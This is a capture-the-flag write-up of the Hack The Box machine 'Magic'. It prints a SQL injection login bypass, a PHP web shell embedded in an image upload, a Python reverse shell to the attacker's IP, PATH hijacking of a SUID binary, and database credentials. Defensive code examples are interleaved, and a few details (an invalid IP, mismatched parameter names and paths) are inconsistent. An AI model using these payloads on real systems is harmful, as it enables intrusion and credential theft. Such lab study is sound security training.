23rd November 2020

Hack The Box – Magic – 10.10.10.185

Any sufficiently advanced technology is indistinguishable from magic.

Arthur C. Clarke

About Magic

In this post, I’m writing a write-up for the machine Magic from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills.

Magic is a ‘Medium’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15 and submitting the root flag your points will be raised by 30.

Foothold
After I found that a web server is running on HTTP port 80, I checked the website hosted on it and found that the login page is vulnerable to SQL injection. After logging in on the web portal I’m able to upload images. With Burp Suite I modified the upload request, embedded a small PHP web shell into the image and gained access as www-data with a reverse shell.

User
In the root folder of the web server, I found the db.php5 file with credentials. As the MySQL client isn’t installed on the server, I’m not able to connect to the database with the regular client using these credentials. After further searching, I found some MySQL programs in the ‘/usr/bin’ folder. With the program mysqldump I dumped the database ‘Magic’, which contains the login credentials for the user ‘theseus’.

Root
After running LinEnum.sh I found that the program sysinfo is installed on this box and runs in the root context. By hijacking the PATH variable, I was able to get a reverse shell to my machine and root this box.

Are you ready to see some magic?

Machine Info

[Image: Machine Info]
[Image: Machine IP and machine maker]

Recon

Port scan

As always I start this box with a Nmap port scan.

~$ nmap -sC -sV -oA ./nmap/magic.txt 10.10.10.185

The results of the port scan.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-18 15:01 EDT
Nmap scan report for 10.10.10.185
Host is up (0.053s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.69 seconds

There are only two open ports.

  1. 22/tcp (SSH)
  2. 80/tcp (HTTP)

Enumeration web server

I start with the enumeration of the web server and visit the web page http://10.10.10.185. I land on a page that lets users upload images. It seems to be an image hosting website.

[Image: http://10.10.10.185]

On the left side at the bottom of this web page there is a logon button. This button redirects me to a login form.

[Image: login form at http://10.10.10.185/login.php]

After some trying, I’m able to log in with this username and password:

username: ' or 1=1 --
password: ' or 1=1 --

I’m now able to upload images.
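To show why the input above works, here is an added example (my own code, not from the box or the author): a login lookup built by string formatting next to the same lookup with bound parameters, run against a constructed in-memory copy of the `login` table from the dump later in this post.

```python
import sqlite3
from typing import Optional

def _db() -> sqlite3.Connection:
    """Constructed in-memory copy of the `login` table shown in the mysqldump output."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE login (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO login VALUES (1, 'admin', 'Th3s3usW4sK1ng')")
    return con

def login_vulnerable(username: str, password: str) -> Optional[str]:
    """Query built by string formatting (the bug). The quote in the input closes the
    string literal, `or 1=1` makes the WHERE clause always true, and `-- ` comments out
    the rest of the statement, so the password is never compared."""
    sql = (f"SELECT username FROM login WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = _db().execute(sql).fetchone()
    return row[0] if row else None

def login_safe(username: str, password: str) -> Optional[str]:
    """Same lookup with bound parameters: the input is data, never parsed as SQL."""
    row = _db().execute(
        "SELECT username FROM login WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None

# The exact input used on the login form above (note the space after `--`,
# which MySQL requires for a line comment; SQLite accepts it too).
PAYLOAD = "' or 1=1 --"

if __name__ == "__main__":
    print("vulnerable:", login_vulnerable(PAYLOAD, PAYLOAD))  # admin
    print("safe:      ", login_safe(PAYLOAD, PAYLOAD))        # None
```

The dump also shows the password stored in plaintext; storing a salted hash instead limits the damage when the table leaks, as it does later in this box.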

[Image: http://10.10.10.185/upload.php]

Gaining Access

Modify HTTP Post request on upload

I can now upload files. I tried to upload a PHP file, but that’s not going to work: the server only allows image files to be uploaded. I need to fool the upload check, and I use Burp Suite for this. I like rabbits, so I take a nice rabbit picture: I downloaded a random PNG file from Google and uploaded it to the server, intercepted the upload request and modified it.

First, I changed the filename from myrabbit.png to myrabbit.php.png, this is line 8 in the image below. At the end of the header, I added my shellcode and removed the body. This is line 35 in the image.

<?php echo system($_REQUEST['shell']); ?>
[Image: HTTP POST request in Burp Suite after the modification]

After the image was uploaded, I navigated in the browser to ‘http://10.10.10.185/uploads/myrabbit.php.png?shellcode=whoami’. The command ‘whoami’ was passed to the uploaded web shell and got executed.

[Image: http://10.10.10.185/uploads/myrabbit.php.png?shellcode=whoami]
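The double extension works because the upload check only looks at the tail of the filename. As an added example (my own code, not the box’s upload.php), here is that naive check next to a validation that allows exactly one extension from an allow-list, verifies the magic bytes, and stores the file under a server-chosen name; the allow-list and the sample PNG bytes are constructed for the example.

```python
import os
import re
import secrets
from typing import Optional, Tuple

# Magic bytes per allowed extension (assumed allow-list; extend as needed).
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff"}
# One base name, exactly one extension, nothing else: `myrabbit.php.png` cannot match.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.(png|jpe?g)$", re.IGNORECASE)

# Constructed sample: a valid PNG signature followed by the web shell from the post.
FAKE_PNG = b"\x89PNG\r\n\x1a\n" + b"<?php echo system($_REQUEST['shell']); ?>"

def naive_check(filename: str) -> bool:
    """The kind of check a double extension slips past: it only looks at the tail."""
    return filename.lower().endswith((".png", ".jpg", ".jpeg"))

def validate_upload(filename: str, data: bytes) -> Tuple[bool, str, Optional[str]]:
    """Return (accepted, reason, name_to_store_under)."""
    name = os.path.basename(filename)  # drop any client-supplied directory part
    if not SAFE_NAME.match(name):
        return False, "name must be <base>.<png|jpg|jpeg> with a single extension", None
    ext = name.rsplit(".", 1)[1].lower()
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match the claimed image type", None
    # Never reuse the client's name on disk; the server picks a random one.
    return True, "ok", f"{secrets.token_hex(8)}.{ext}"

if __name__ == "__main__":
    print(naive_check("myrabbit.php.png"))                # True: bypassed
    print(validate_upload("myrabbit.php.png", FAKE_PNG))  # rejected on the name
    print(validate_upload("myrabbit.png", FAKE_PNG))      # accepted: bytes are a real PNG header
```

Note that the last call still accepts the file, because the bytes really do start with a PNG signature; what makes an image with PHP inside harmless is the web server never executing anything under the upload directory (no PHP handler for that path, or storage outside the webroot).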

Reverse shell as www-data

Through the web shell I can now download my PHP file containing the reverse shell command to my machine with ‘http://10.10.10.185/images/uploads/myrabbit.php.png?shell=wget 10.10.10.14.42:8000/php-reverse-shell.php’. After the PHP file is downloaded, I execute it with ‘http://10.10.10.185/images/uploads/myrabbit.php.png?shell=php -f php-reverse-shell.php’. I got a reverse shell as the user www-data.

~$ whoami
www-data

I invoked the command to upgrade the shell.

~$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu$

I now have an upgraded shell and can start the enumeration for the user flag. I begin by enumerating the users on this box. In the home folder I found that there is one other user account on this box.

home$ ls
theseus

I found the file ‘db.php5’ in ‘www/Magic’ with the username theseus and the password iamkingtheseus. These are the credentials for the MySQL database. With these credentials I can connect to the database and dump it with mysqldump.

www-data@ubuntu:/tmp$ /usr/bin/mysqldump --databases Magic --user=theseus --password=iamkingtheseus > dump.sql

I got the credentials.

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2020-04-22 14:18:50

Switch to the user theseus.

www-data@ubuntu:/tmp$ su - theseus
su - theseus
Password: Th3s3usW4sK1ng

theseus@ubuntu:~$ whoami
whoami
theseus
theseus@ubuntu:~$ ls
ls
Desktop    Downloads  Pictures Templates  Videos
Documents  Music      Public   user.txt
theseus@ubuntu:~$ cat user.txt
cat user.txt
eb0041b0dddb7b8610cb79e0fff91cb0
theseus@ubuntu:~$

Privilege escalation

Privilege Escalation using PATH variable

After I got the user flag I checked further on this machine with LinEnum.sh. I downloaded this script from my machine to this box and run the LinEnum.sh script. In the results, I found that /bin/sysinfo is installed on this machine.

theseus@ubuntu:~/Desktop$ bash LinEnum.sh
[-] SGID files:
...
-rwsr-xr-x 1 root root 54256 Mar 25  2019 /snap/core/7917/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jun 10  2019 /snap/core/7917/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10  2019 /snap/core/7917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar  4  2019 /snap/core/7917/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Oct  1  2019 /snap/core/7917/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jun 12  2018 /snap/core/7917/usr/sbin/pppd
-rwsr-xr-x 1 root root 26696 Jan  8 10:31 /bin/umount
-rwsr-xr-x 1 root root 30800 Aug 11  2016 /bin/fusermount
-rwsr-x--- 1 root users 22040 Oct 21  2019 /bin/sysinfo
-rwsr-xr-x 1 root root 43088 Jan  8 10:31 /bin/mount
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /bin/su
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /bin/ping
...

The ‘bin’ directory is where the executable programs are stored. The program ‘sysinfo’ does not come pre-installed with Ubuntu; it is a custom program that was installed manually. When I run this program, I can see all the hardware information of this machine.

As this program runs in the root context, it can be a way to gain root privileges. I only need to find a way to exploit sysinfo. I started Googling and found an article on hackingarticles.in about privilege escalation using the PATH variable.

I needed to put the pieces together, so I asked one of my contacts from Hack The Box if he could help me, and he did. He advised me to create a file named lshw, place it in the directory /tmp/payload and then change the PATH variable.

And so I did. I created the file with the reverse shell.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.39",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

I dropped this file in the /tmp/payload folder and set the permissions.

theseus@ubuntu:/tmp/payload$ chmod 775 lshw

Changed the PATH variable.

export PATH=/tmp/payload:$PATH

Started a reverse shell listener on my box. And then the moment of truth… I invoked this command.

theseus@ubuntu:/tmp/payload$ /bin/sysinfo

And the reverse shell is established! Bingo, I can now get the root flag and take a beer.

~$ nc -lvp 6666
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Ncat: Connection from 10.10.10.185.
Ncat: Connection from 10.10.10.185:39596.
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
# ls
lshw
# pwd
/tmp/payload
# cd /root
# cat root.txt
d940dcff8146f4a3764d9f069541f368
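From the defender’s side, the two things worth automating here are spotting a non-stock SUID binary in the LinEnum output and understanding why an unqualified command inside it is hijackable. The following is an added example (my own code, not LinEnum’s or the box’s): it parses the SUID lines shown above against an assumed baseline, and simulates the PATH lookup over a constructed fake filesystem so the effect of prepending /tmp/payload, and of a fixed PATH, is visible without touching the real system.

```python
import re
from typing import Dict, Iterable, List, Optional, Set

# Constructed sample: the SUID lines from the LinEnum output above (values from the post).
LINENUM_LINES = """
-rwsr-xr-x 1 root root 26696 Jan  8 10:31 /bin/umount
-rwsr-xr-x 1 root root 30800 Aug 11  2016 /bin/fusermount
-rwsr-x--- 1 root users 22040 Oct 21  2019 /bin/sysinfo
-rwsr-xr-x 1 root root 43088 Jan  8 10:31 /bin/mount
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /bin/su
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /bin/ping
""".strip().splitlines()

# Assumed baseline of SUID-root binaries expected on this host; in practice generate it
# from the package manager or a golden image rather than typing it by hand.
BASELINE: Set[str] = {"/bin/umount", "/bin/fusermount", "/bin/mount", "/bin/su", "/bin/ping"}

# `ls -l` style line: mode, links, owner, group, size, month, day, time-or-year, path
LS_RE = re.compile(r"^(?P<mode>[-a-zA-Z]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
                   r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<path>\S+)$")

def unexpected_suid_root(lines: Iterable[str], baseline: Set[str] = BASELINE) -> List[str]:
    """Flag root-owned setuid binaries that are not in the baseline (mode[3] is the
    owner-execute slot; 's' or 'S' there means the setuid bit is set)."""
    hits = []
    for line in lines:
        m = LS_RE.match(line.strip())
        if m and m["mode"][3] in "sS" and m["owner"] == "root" and m["path"] not in baseline:
            hits.append(m["path"])
    return hits

# Constructed fake filesystem: directory -> names of executables in it.
FAKE_FS: Dict[str, Set[str]] = {"/usr/bin": {"lshw", "ls"}, "/tmp/payload": {"lshw"}}

def resolve_command(cmd: str, path_env: str, fs: Dict[str, Set[str]] = FAKE_FS) -> Optional[str]:
    """Simulate how a shell (or popen/system inside a setuid helper) finds an unqualified
    command: the first PATH directory containing it wins. The dynamic loader ignores
    LD_PRELOAD for setuid programs, but nothing sanitizes PATH, so a helper that calls
    plain `lshw` is only safe if it resets PATH or uses an absolute path."""
    for d in path_env.split(":"):
        if cmd in fs.get(d, set()):
            return f"{d}/{cmd}"
    return None

if __name__ == "__main__":
    print(unexpected_suid_root(LINENUM_LINES))                       # ['/bin/sysinfo']
    print(resolve_command("lshw", "/tmp/payload:/usr/bin"))          # /tmp/payload/lshw
    print(resolve_command("lshw", "/usr/sbin:/usr/bin:/sbin:/bin"))  # /usr/bin/lshw
```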

Did you enjoy this write-up as much as I did writing it? Consider giving a respect point, my profile at Hack The Box: https://www.hackthebox.eu/home/users/profile/224856, Thanks in advance!

This blog is completely free of advertisements. Please consider buying me a coffee. Thanks!!


Happy Hacking!

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.
